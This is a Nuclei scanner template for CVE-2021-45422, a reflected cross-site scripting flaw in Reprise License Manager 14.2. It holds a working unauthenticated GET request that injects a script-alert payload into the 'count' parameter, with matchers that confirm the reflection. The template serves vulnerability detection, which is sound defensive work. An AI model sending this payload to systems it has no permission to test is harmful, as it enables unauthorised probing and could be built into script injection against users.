nuclei-templates/cves/2021/CVE-2021-45422.yaml

38 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-31 06:21:31 +00:00
id: CVE-2021-45422
info:
name: Reprise License Manager 14.2 - Reflected XSS
author: edoardottt
severity: medium
description: Reprise License Manager 14.2 is affected by a reflected cross-site scripting vulnerability in the /goform/activate_process "count" parameter via GET. No authentication is required.
reference:
- https://seclists.org/fulldisclosure/2022/Jan/31
- https://nvd.nist.gov/vuln/detail/CVE-2021-45422
- https://www.getinfosec.news/13202933/reprise-license-manager-142-reflected-cross-site-scripting#/
2022-07-31 06:21:31 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-45422
cwe-id: CWE-79
tags: cve,cve2021,reprise,xss
requests:
- method: GET
path:
- "{{BaseURL}}/goform/activate_process?isv=&akey=&hostid=&count=%3Cscript%3Ealert(%221%22)%3C/script%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- "<script>alert(\"1\")</script>"